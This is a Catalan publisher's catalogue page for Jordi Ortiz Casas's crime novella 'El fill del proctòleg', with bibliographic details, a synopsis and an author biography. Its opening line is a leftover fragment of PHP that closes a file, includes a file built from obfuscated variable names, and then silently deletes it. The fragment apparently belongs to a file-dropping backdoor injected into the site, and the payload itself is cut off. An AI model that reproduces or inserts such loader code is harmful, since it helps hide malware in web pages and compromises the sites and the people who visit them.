");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - El fill del proctòleg
Cercador d'Obres
ORDENAR:
Començar recerca

El fill del proctòleg

Ortiz Casas, Jordi

Col·lecció:
Magatzem Can Toni
Tema:
Narració breu
Pàgines:
124
PVP:
12.00
ISBN:
978-84-18441-35-6
Data d'Edició:
30/06/2021
XXVIII Premi Joan Marquès Arbona de narrativa Vall de Sóller 2020.


Sinopsi
En Bernat Calafell és un jove de bona família que es rebel·la contra el futur plàcid que els pares han previst per a ell. Un cop acabada la carrera de medi­cina, refusa establir-se amb el pare, proctòleg de renom.
En Bernat decideix emancipar-se i es trasllada al pis que els avis li van deixar en herència, al barri de la Ribera de Barcelona. Allà es relaciona amb gent que es mou en els marges de la societat i accepta feines que voregen la lega­litat -i sovint la traspassen- per sobreviure. Als carrerons de la ciutat vella, s’hi apliquen normes ben particulars i només hi prosperen els qui s’hi adapten. Quan en Bernat ja ha aconseguit fer-se respectar, li arriba un encàrrec del tot inesperat: un home pretén que mati el seu fill.


Llegir les Primeres pàgines en PDF
Llegir l'Índex en PDF


Jordi Ortiz Casas
Va néixer a Barcelona el 1969. Es va iniciar en l’escriptura, al final del segle passat, amb un parell de novel·les negres. Des de llavors, ja ha publicat una vintena de títols més, adreçats a tota mena de públics. Les seves narracions han rebut nombrosos premis, entre els quals destaquen el Contarella de Ciutadella de Menorca (Bublub, el peix que no sabia nedar) i el Vila de Perpinyà (Gota d’aigua), per a infants; el Mallorca (In absentia [Judici a la Terra]) i el Ciutat d’Olot (Doble identitat), per a joves; el Ciutat d’Elx-Antoni Bru dues vegades (Essència de guaiaba, Somnis) i el Ciutat de Badalona (Oprimits), destinats a un públic adult, i el Carlemany per al foment de la lectura (Vorejant els límits), votat per un jurat de joves, que aspira a reunir lectors de diversos grups d’edat. A banda d’escriure, dedica força temps a visitar escoles i instituts per intentar despertar en el jovent la passió per la lectura i l’escriptura.A les Edicions Documenta Balear ha publicat, Ulls d'espant (2018) i El fill del proctòleg (2021).


Recomanar
Comentar
Comentaris (0)